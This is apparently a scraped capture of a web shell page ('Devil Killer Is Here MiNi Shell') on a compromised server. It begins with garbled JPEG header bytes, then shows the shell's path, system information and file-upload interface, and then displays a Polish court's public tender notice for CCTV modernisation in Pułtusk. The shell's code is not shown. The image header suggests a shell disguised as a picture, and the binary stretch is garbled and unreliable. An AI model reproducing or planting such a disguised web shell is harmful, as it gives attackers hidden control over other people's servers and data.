JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231102/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231102/0047391701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> WYKONANIE PRAC/ROBÓT DOTYCZĄCYCH MODERNIZACJI SYSTEMU MONITORINGU WIZYJNEGO (CCTV) W BUDYNKACH SĄDU REJONOWEGO W PUŁTUSKU, UL. RYNEK 37, 06–100 PUŁTUSK </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Okręgowy w Ostrołęce</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Sąd Okręgowy w Ostrołęce</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000570648</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Gomulickiego 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ostrołęka</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">07-410</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat.dyrektora@ostroleka.so.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.ostroleka.so.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> WYKONANIE PRAC/ROBÓT DOTYCZĄCYCH MODERNIZACJI SYSTEMU MONITORINGU WIZYJNEGO (CCTV) W BUDYNKACH SĄDU REJONOWEGO W PUŁTUSKU, UL. RYNEK 37, 06–100 PUŁTUSK </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f4573bc1-797b-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00473917</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00112571/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Wykonanie prac/robót dotyczących modernizacji Systemu Monitoringu Wizyjnego (CCTV) w budynkach Sądu Rejonowego w Pułtusku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f4573bc1-797b-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">wymagany podpis elektroniczny do podpisywania dokumentów</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Rozdział 3. str. 2 -3 w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Rozdział 3. str. 2 -3 w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/7/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wykonanie prac/robót dotyczących instalacji elektrycznych niskoprądowej to jest dotyczących modernizacji Systemu Monitoringu Wizyjnego (CCTV) w budynkach Sądu Rejonowego w Pułtusku, ul. Rynek 37, 06–100 Pułtusk – prace/roboty oraz dobór materiałów/urządzeń/instalacji wykonać na podstawie Projektu Wykonawczego i Przedmiaru Robót – stanowiącego Załącznik Nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">92222000-3 - Usługi telewizji zamkniętego obiegu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Punkty w danym kryterium zostaną przyznane następująco:<br/>17.2.1. Kryterium Cena (C): w przypadku kryterium „Cena” oferta otrzyma<br/>zaokrągloną do dwóch miejsc po przecinku ilość punktów wynikającą<br/>z działania:<br/>cena oferowana minimalna brutto<br/>Cena = -------------------------------------------- x100 x 60 %<br/>cena badanej oferty brutto<br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 60 pkt. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Uzyskana liczba punktów badanej oferty zostanie pomnożona przez wagę tego kryterium. Wynik będzie traktowany jako wartość punktowa oferty w kryterium Cena.<br/>17.2.2. Kryterium: Doświadczenie pracownika (D) rozpatrywane będzie<br/>na podstawie następujących zasad:<br/> za skierowanie przez Wykonawcę do realizacji zamówienia<br/>pracowników z doświadczeniem minimum 6 (sześciu) miesięcy<br/>(staż pracy) przy wykonywaniu prac/robót dotyczących instalacji<br/>elektrycznych niskoprądowych w obiektach użyteczności<br/>publicznej (np.: sądy, prokuratury, urzędy, banki) – 20 pkt<br/> za skierowanie przez Wykonawcę do realizacji zamówienia<br/>pracowników z doświadczeniem powyżej 6 (sześciu) miesięcy<br/>(staż pracy) przy wykonywaniu prac/robót dotyczących instalacji<br/>elektrycznych niskoprądowych w obiektach użyteczności<br/>publicznej (np.: sądy, prokuratury, urzędy, banki) – 40 pkt.<br/>Najwyższą liczbę punktów (40 pkt) w kryterium „Doświadczenie<br/>pracownika” otrzyma oferta Wykonawcy, który wykaże, że skieruje<br/>do realizacji zamówienia pracowników z doświadczeniem powyżej<br/>6 miesięcy przy wykonywaniu prac/robót dotyczących instalacji<br/>elektrycznych niskoprądowych w obiektach użyteczności publicznej (np.:<br/>sądy, prokuratury, urzędy, banki).<br/>17.3. Oferty oceniane będą według wzoru:<br/>L = C + D<br/>gdzie:<br/>L = całkowitej liczbie punktów przyznanych ofercie badanej<br/>C = liczbie punktów jakie otrzyma oferta badana w kryterium „Cena”<br/>D = liczbie punktów jakie otrzyma oferta badana w kryterium „Doświadczenie<br/>pracownika”.<br/>Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie pracownika (D)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający wymaga spełnienia warunków udziału w postępowaniu dotyczące:<br/>11.2.1. Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie określa warunku w wyżej wymienionym zakresie.<br/>11.2.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie określa warunku w wyżej wymienionym zakresie.<br/>11.2.3. Sytuacji ekonomicznej lub finansowej:<br/>Celem potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu lub kryteriów selekcji dotyczących sytuacji ekonomicznej<br/>lub finansowej Zamawiający wymaga, aby Wykonawca posiadał<br/>opłacone/ważne ubezpieczenie od odpowiedzialności cywilnej z tytułu<br/>prowadzonej działalności na sumę ubezpieczenia na nie niższą niż<br/>100 000,00 zł. Przez użycie sformułowania opłaconego/ważnego należy<br/>rozumieć posiadanie przez Wykonawcę polisy ubezpieczeniowej ważnej<br/>i opłaconej przez cały okres trwania/obowiązywania Umowy<br/>Wykonawczej.<br/>11.2.4. Zdolności technicznej lub zawodowej:<br/>Celem potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu lub kryteriów selekcji dotyczących zdolności technicznej<br/>lub zawodowej Zamawiający wymaga dokumentów – wykazu prac/robót:<br/>Wykonawca spełni warunek, jeżeli wykaże, że w okresie ostatnich<br/>3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie<br/>prace/roboty dotyczące budowy lub modernizacji lub przebudowy lub<br/>remontu instalacji elektrycznej niskoprądowej w tym w szczególności<br/>systemu monitoringu wizyjnego (CCTV), w ilości: w 2 (dwóch) obiektach<br/>użyteczności publicznej (np.: sądy, prokuratury, urzędy, banki),<br/>z których każda realizowana była/jest na podstawie jednej<br/>umowy/zamówienia oraz każda z nich jest o wartości co najmniej:<br/>100 000,00 zł brutto, wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których prace/roboty zostały/są<br/>wykonane oraz załączeniem dowodów określających czy te prace/roboty<br/>zostały/są wykonane należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz<br/>którego prace/roboty były/są wykonywane, a jeżeli z uzasadnionej<br/>przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie<br/>uzyskać tych dokumentów – oświadczenie Wykonawcy. Referencje bądź<br/>inne dokumenty potwierdzające ich należyte wykonanie lub wykonywanie<br/>powinny być wydane nie wcześniej niż 3 (trzy) miesiące przed upływem<br/>terminu składania ofert.<br/>Jeżeli Wykonawca zamiast referencji lub innych dokumentów, o których<br/>mowa powyżej złoży/załączy oświadczenie, że prace/roboty zostały przez<br/>niego wykonane lub są wykonywane należycie wówczas Wykonawca<br/>zobowiązany jest do przedstawienia Zamawiającemu wyczerpującego<br/>uzasadnienia przyczyny braku uzyskania referencji lub innych dokumentów<br/>od podmiotu, na rzecz którego prace/roboty są/były wykonywane/nane.<br/>11.2.5. Zdolności technicznej lub zawodowej – dysponuje osobami zdolnymi<br/>do wykonania Zamówienia:<br/>Celem potwierdzenia spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu lub kryteriów selekcji dotyczących zdolności technicznej<br/>lub zawodowej – dysponowanie osobami/pracownikami zdolnymi<br/>do wykonania Zamówienia, Zamawiający wymaga, aby Wykonawca<br/>dysponował:<br/>11.2.5.1. przynajmniej 3 (trzema) pracownikami zapewniającymi<br/>wykonywanie Umowy Wykonawczej, z których przynajmniej 2<br/>(dwóch) posiadających kwalifikacje w zakresie eksploatacji<br/>urządzeń, instalacji i sieci elektroenergetycznych<br/>wytwarzających, przetwarzających, przesyłających i<br/>zużywających energię elektryczną urządzeń o napięciu nie<br/>wyższym niż 1 kV;<br/>11.2.5.2. 1 (jednym) pracownikiem zapewniającym wykonywanie Umowy<br/>Wykonawczej – pracownik nadzorujący realizację Umowy<br/>Wykonawczej – Koordynator. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">12.1.2. Dokumenty i oświadczenia:<br/> oświadczenie Wykonawcy w zakresie art. 108. ust. 1. pkt 5) ustawy<br/>Pzp, o braku przynależności do tej samej grupy kapitałowej<br/>w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (tekst jednolity: z dnia 22 stycznia 2021 r. Dz. U. z 2021 r.<br/>poz. 275 z późniejszymi zmianami), z innym wykonawcą, który złożył<br/>odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do<br/>udziału w postępowaniu, albo oświadczenia o przynależności do tej<br/>samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku<br/>o dopuszczenie do udziału w postępowaniu niezależnie<br/>od innego wykonawcy należącego do tej samej grupy kapitałowej<br/>– Załącznik Nr 9 do SWZ;<br/> kopię poświadczoną „za zgodność z oryginałem” opłaconego/ważnego<br/>ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej<br/>działalności na sumę ubezpieczenia na nie niższą niż 100 000,00 zł (sto<br/>tysięcy złotych). Przez użycie sformułowania opłaconego/ważnego<br/>należy rozumieć posiadanie przez Wykonawcę polisy<br/>ubezpieczeniowej ważnej i opłaconej przez cały okres<br/>trwania/obowiązywania Umowy Wykonawczej;<br/> kopię poświadczoną „za zgodność z oryginałem” lub oryginał<br/>aktualnego Odpisu lub informacji z Krajowego Rejestru Sądowego<br/>lub z Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej, w zakresie art. 109. ust. 1. pkt 4) ustawy Pzp,<br/>sporządzonych nie wcześniej niż 3 (trzy) miesiące przed jej złożeniem,<br/>jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/> kopię poświadczoną „za zgodność z oryginałem” lub oryginał<br/>aktualnego Zaświadczenia właściwego naczelnika urzędu<br/>skarbowego potwierdzającego, że Wykonawca nie zalega<br/>z opłacaniem podatków i opłat, w zakresie art. 109. ust. 1. pkt 1) ustawy<br/>Pzp, wystawionego nie wcześniej niż 3 (trzy) miesiące przed jego<br/>złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat<br/>wraz z zaświadczeniem zamawiający żąda złożenia dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania<br/>wniosków o dopuszczenie do udziału w postępowaniu albo przed<br/>upływem terminu składania ofert Wykonawca dokonał płatności<br/>należnych podatków lub opłat wraz z odsetkami lub grzywnami lub<br/>zawarł wiążące porozumienie w sprawie spłat tych należności;<br/> kopię poświadczoną „za zgodność z oryginałem” lub oryginał<br/>aktualnego Zaświadczenia albo innego dokumentu właściwej<br/>terenowej jednostki organizacyjnej Zakładu Ubezpieczeń<br/>Społecznych lub właściwego oddziału regionalnego lub właściwej<br/>placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego<br/>potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na<br/>ubezpieczenia społeczne i zdrowotne, w zakresie art. 109. ust. 1. pkt 1)<br/>ustawy Pzp, wystawionego nie wcześniej niż 3 (trzy) miesiące przed<br/>jego złożeniem, a w przypadku zalegania z opłacaniem składek<br/>na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo<br/>innym dokumentem zamawiający żąda złożenia dokumentów<br/>potwierdzających, że odpowiednio przed upływem terminu składania<br/>wniosków o dopuszczenie do udziału w postępowaniu albo przed<br/>upływem terminu składania ofert Wykonawca dokonał płatności<br/>należnych składek na ubezpieczenia społeczne lub zdrowotne wraz<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie<br/>spłat tych należności;<br/> kopię poświadczoną „za zgodność z oryginałem” lub oryginał aktualnej<br/>Informacji z Krajowego Rejestru Karnego w zakresie dotyczącym<br/>podstaw wykluczenia wskazanych w art. 108. ust. 1. pkt 1), 2) i 4)<br/>ustawy Pzp sporządzona nie wcześniej niż 6 (sześć) miesięcy przed jej<br/>złożeniem;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">12.1.1. Imienna Lista Pracowników (zwana: „Lista ILP”) skierowanych przez<br/>Wykonawcę do realizacji Zamówienia. Pracownicy wyszczególnieni<br/>w ust. 11.2.5. powyżej SWZ, strona: 10. ÷ 11. SWZ powyżej.<br/>Imienna Lista Pracowników stanowi Załącznik Nr 11 do SWZ.<br/> Wykaz prac/robót:<br/>Wykaz wykonanych na podstawie umów – w okresie ostatnich<br/>3 (trzech) lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wykonał<br/>należycie prace/roboty dotyczące budowy lub modernizacji lub<br/>przebudowy lub remontu instalacji eklektycznej niskoprądowej w tym<br/>w szczególności systemu monitoringu wizyjnego (CCTV), w ilości:<br/>w 2 (dwóch) obiektach użyteczności publicznej (np.: sądy,<br/>prokuratury, urzędy, banki), z których każda realizowana była/jest<br/>na podstawie jednej umowy/zamówienia oraz każda z nich jest<br/>o wartości co najmniej: 100 000,00 zł brutto, wraz z podaniem ich<br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>prace/roboty zostały/są wykonane oraz załączeniem dowodów<br/>określających czy te prace/roboty zostały/są wykonane należycie, przy<br/>czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>wystawione przez podmiot, na rzecz którego prace/roboty były/są<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów<br/>– oświadczenie Wykonawcy. Referencje bądź inne dokumenty<br/>potwierdzające ich należyte wykonanie lub wykonywanie powinny być<br/>wydane nie wcześniej niż 3 (trzy) miesiące przed upływem terminu<br/>składania ofert.<br/>Jeżeli Wykonawca zamiast referencji lub innych dokumentów,<br/>o których mowa powyżej złoży/załączy oświadczenie, że prace/roboty<br/>zostały przez niego wykonane lub są wykonywane należycie wówczas<br/>Wykonawca zobowiązany jest do przedstawienia Zamawiającemu<br/>wyczerpującego uzasadnienia przyczyny braku uzyskania referencji<br/>lub innych dokumentów od podmiotu, na rzecz którego prace/roboty<br/>są/były wykonywane/nane.<br/>Wykaz prac/robót stanowi Załącznik Nr 8 do SWZ.<br/> oświadczenie Wykonawcy, że każdy z pracowników wyszczególniony<br/>w/na Liście ILP:<br/>o zatrudniony jest u Wykonawcy na podstawie umowy o pracę przez<br/>cały okres realizowania Umowy Wykonawczej – powyższe nie<br/>dotyczy Koordynatora;<br/>o posiada minimum 6 (sześcio) – miesięczne doświadczenie (staż<br/>pracy) przy wykonywaniu prac/robót dotyczących instalacji<br/>elektrycznych niskoprądowych;<br/>o posiada pełną zdolność fizyczną i psychiczną do wykonywania<br/>prac/robót;<br/>o nie występuje w ewidencji Krajowego Rejestru Karnego<br/>– niniejsze nie dotyczy Koordynatora;<br/>o posiada aktualne zaświadczenie lekarskie, lekarza medycyny pracy<br/>o braku przeciwwskazań do pracy na stanowisku pracownika<br/>wykonującego prace/roboty dotyczące instalacji elektrycznych<br/>niskoprądowych – niniejsze nie dotyczy Koordynatora;<br/>o został zobowiązany do zachowania tajemnicy służbowej<br/>i ochrony danych osobowych – dotyczących wszelkich informacji<br/>i danych uzyskanych w związku z realizacją Umowy;<br/>o został przeszkolony z zakresu przepisów: BHP, ochrony<br/>przeciwpożarowej i ochrony danych osobowych,</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków 